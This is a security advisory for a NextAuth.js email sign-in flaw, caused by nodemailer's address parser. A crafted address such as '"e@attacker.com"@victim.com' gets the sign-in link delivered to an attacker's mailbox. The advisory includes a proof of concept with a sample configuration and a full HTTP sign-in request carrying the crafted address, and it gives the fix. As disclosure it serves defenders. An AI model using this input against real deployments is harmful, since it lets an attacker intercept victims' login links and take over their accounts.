PT-2025-45675 · Npm · Next-Auth

Publicado

2025-10-29

·

Atualizado

2025-10-29

CVSS v4.0

6.9

Média

VetorAV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P

Summary

NextAuth.js's email sign-in can be forced to deliver authentication emails to an attacker-controlled mailbox due to a bug in nodemailer's address parser used by the project (fixed in nodemailer v7.0.7). A crafted input such as:
"e@attacker.com"@victim.com
is parsed incorrectly and results in the message being delivered to e@attacker.com (attacker) instead of "<e@attacker.com>@victim.com" (the intended recipient at victim.com) in violation of RFC 5321/5322 semantics. This allows an attacker to receive login/verification links or other sensitive emails intended for the victim.

Affected NextAuthjs Version

≤ VersionAfftected
4.24.11Yes
5.0.0-beta.29Yes

POC

Example Setup showing misdelivery of email
jsx
import NextAuth from "next-auth"
import Nodemailer from "next-auth/providers/nodemailer"
import { PrismaAdapter } from "@auth/prisma-adapter"
import { prisma } from "@/lib/prisma"

export const { handlers, auth, signIn, signOut } = NextAuth({
 adapter: PrismaAdapter(prisma),
 providers: [
  Nodemailer({
   server: {
    host: "127.0.0.1",
    port: 1025,
    ...
   },
   from: "noreply@authjs.dev",
  }),
 ],
 pages: {
  signIn: '/auth/signin',
  verifyRequest: '/auth/verify-request',
 },
})
jsx
POST /api/auth/signin/nodemailer HTTP/1.1
Accept-Encoding: gzip, deflate, br, zstd
Cache-Control: no-cache
Connection: keep-alive
Content-Length: 176
DNT: 1
Host: localhost:3000
Origin: http://localhost:3000
Pragma: no-cache
Referer: http://localhost:3000/auth/signin
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
User-Agent: Mozilla/5.0 (X11; Linux x86 64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36
accept: */*
accept-language: en-US,en;q=0.9,ta;q=0.8
content-type: application/x-www-form-urlencoded
sec-ch-ua: "Google Chrome";v="141", "Not?A Brand";v="8", "Chromium";v="141"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
x-auth-return-redirect: 1

email=%22e%40attacker.coccm%22%40victim.com&csrfToken=90f5e6f48ab577ab011f212011862dcfe546459c23764cf891aab2d176f8d77a&callbackUrl=http%3A%2F%2Flocalhost%3A3000%2Fauth%2Fsignin
Screenshot from 2025-10-25 21-15-25 Screenshot from 2025-10-25 21-14-47

Mitigation

Update to nodemailer 7.0.7

Credits

https://zeropath.com/ Helped identify this security issue

Correção

Information Disclosure

Encontrou algum problema na descrição? Tem algo a acrescentar? Fique à vontade para nos escrever 👾
dbugs@ptsecurity.com

Enumeração de Fraquezas

CWE-200

Identificadores relacionados

GHSA-5JPX-9HW9-2FX4

Produtos afetados

Next-Auth